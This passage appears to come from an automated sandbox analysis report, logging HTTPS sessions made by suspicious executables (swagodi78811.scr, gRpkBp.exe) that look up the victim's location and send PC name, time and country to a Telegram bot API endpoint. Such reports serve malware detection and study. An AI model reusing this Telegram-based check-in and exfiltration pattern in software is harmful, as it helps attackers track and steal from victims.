                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-26 21:45:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              17192.168.2.2249186188.114.96.34433880C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              TimestampBytes transferredDirectionData
                                              2024-07-26 21:45:43 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-07-26 21:45:43 UTC716INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:43 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 52956
                                              Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vzas4S%2FwBtOQlzVTaimikMNz2yy8%2F9w8HNjgIDWNz6fK%2BW0DEiiwD2SlS30QniGKd%2BVT8XUeNaWGmBdivppWimBD9FpG%2FGnCo2I0RMUahfkv6Su6o3%2FUd%2FCgFpsWWb9QHBOhzSJ%2B"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a97941139c942d0-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:43 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-26 21:45:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              18192.168.2.2249188188.114.97.34432060C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-26 21:45:44 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-07-26 21:45:45 UTC704INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:45 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 52958
                                              Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l3Dr9o7%2Bc7SeJeOrpbKcUseqs0fO23KPLVC3jy2oZ70R3T1kJ27crmNw4IuoGVQuvk6hHhSDLOlGkTjZFi7EMuaVOMK0GZEcS86AHyODGnAs5dfHcXdCVcisegxnL8zzBS%2FJpyBN"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a979418ae6f7c90-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:45 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-26 21:45:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              19192.168.2.2249189188.114.96.34433880C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              TimestampBytes transferredDirectionData
                                              2024-07-26 21:45:45 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-07-26 21:45:45 UTC722INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:45 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 52958
                                              Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xa2T%2BFUzCyhdxO5gfIZfiU24iOGD6pxoc4JWlhED3Ym8aOcbs51JruV%2FIMwFZ%2BbKI%2B36Hm%2F%2BjMoEe8edXWUtq605P8YM%2BR%2BTBgl%2F%2B5UTSX4ndng1uYPhoJ%2BfiI638uDUiSiPKfCq"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a97941c1c5243e8-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:45 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-26 21:45:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              20192.168.2.2249192188.114.96.34433880C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              TimestampBytes transferredDirectionData
                                              2024-07-26 21:45:47 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-07-26 21:45:47 UTC706INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:47 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 52960
                                              Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bOno3iJJ22ihgUAEFf7SL8%2B0akGYRFerwQzebtELe%2BnlzkJhv2iiUz4%2BTPLH8hUsfmc05fOy0FCEwhfuk4dR32e1mxwtzd3OH3Rrt2eSqwJRqt9pA5KLhDmIsv20Nz29wUnP8XJa"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a979425bb325e73-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:47 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-26 21:45:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              21192.168.2.2249193188.114.97.34432060C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-26 21:45:47 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-07-26 21:45:47 UTC704INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:47 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 52960
                                              Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L56wdnqxpgpbX9pv9DJ8UCEavw1e6Zg25GZhaCUbwjeFqQwVh0sEgwwqmEfDw25j6GXeckaU4J9wuhjup5cNVCsLhSlf4howdQAIQTi5F%2FPVry6do14NtNMiERhh52ZqXoGM%2FWCT"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a9794276e503314-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:47 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-26 21:45:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              22192.168.2.2249194149.154.167.2204433880C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              TimestampBytes transferredDirectionData
                                              2024-07-26 21:45:47 UTC348OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%207/27/2024%20/%207:26:36%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A[%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1
                                              Host: api.telegram.org
                                              Connection: Keep-Alive
                                              2024-07-26 21:45:48 UTC344INHTTP/1.1 404 Not Found
                                              Server: nginx/1.18.0
                                              Date: Fri, 26 Jul 2024 21:45:48 GMT
                                              Content-Type: application/json
                                              Content-Length: 55
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-07-26 21:45:48 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                              Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              23192.168.2.2249196188.114.96.34432060C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-26 21:45:48 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-07-26 21:45:48 UTC706INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:48 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 52961
                                              Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CDM1u99eMl9a47VgUxQf2MSN%2FdBGGhTx0JeohTYeShVR10oDU3A30GWCFNrarEbCF0FbKWcR8CrmIf%2B9iUiyifMBnfMe81acY033pTX5iBMB2ImXldo%2FL5WqjYRow0vGt5DetZNM"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a97942ebba142b3-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:48 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-26 21:45:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              24192.168.2.2249198188.114.97.34432060C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-26 21:45:49 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-07-26 21:45:50 UTC702INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:49 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 52962
                                              Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kSrH6UDBFGVfK8t209KHi4eranLMcdc5sHzJAP6nePHjBaGwSJIrf4J1ZutNrnMiqNXX9WPutP5y88xDCIajrZ4ouXOqjBiiMNu7W4%2FeOorNn0tDXKncql3tq02XpwrPdeiWUwJJ"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a9794375fcb0ca0-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:50 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-26 21:45:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              25192.168.2.2249200188.114.96.34432060C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-26 21:45:52 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-07-26 21:45:52 UTC712INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:52 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 52965
                                              Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BJNaFU6EgRFSXHj%2B4qAYOuGr%2FEuNrE4%2F5rMkOs73ov2qYm0YhLl2jmDuWcDbC8qzb84wHWJRcPYvlweOV6D%2FfDa%2B9Vo5HBKi66awTsXPAdfQNUO0MWHZYhAQyPYnVMC7tTwOPfgd"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a9794459fc8c47f-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:52 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-26 21:45:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              26192.168.2.2249202188.114.97.34432060C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-26 21:45:53 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-07-26 21:45:53 UTC706INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:53 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 52966
                                              Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aB3zpvJ%2FvdHyvi3XsYlyByJVkLeTqLzDDmKs0fMUHrGZ2VBf3t4qrNdj2bsU1CvvStQOFbIIS%2F70szXjP3xaUkWcsjFaPL4AWpK2dZvYCKi%2BhWya7bupAN1H2kPcQvftxGiBUzIc"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a97944d0cff0f7f-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:53 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-26 21:45:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              27192.168.2.2249203149.154.167.2204432060C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-26 21:45:54 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%207/27/2024%20/%2010:06:41%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A[%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1
                                              Host: api.telegram.org
                                              Connection: Keep-Alive
                                              2024-07-26 21:45:54 UTC344INHTTP/1.1 404 Not Found
                                              Server: nginx/1.18.0
                                              Date: Fri, 26 Jul 2024 21:45:54 GMT
                                              Content-Type: application/json
                                              Content-Length: 55
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
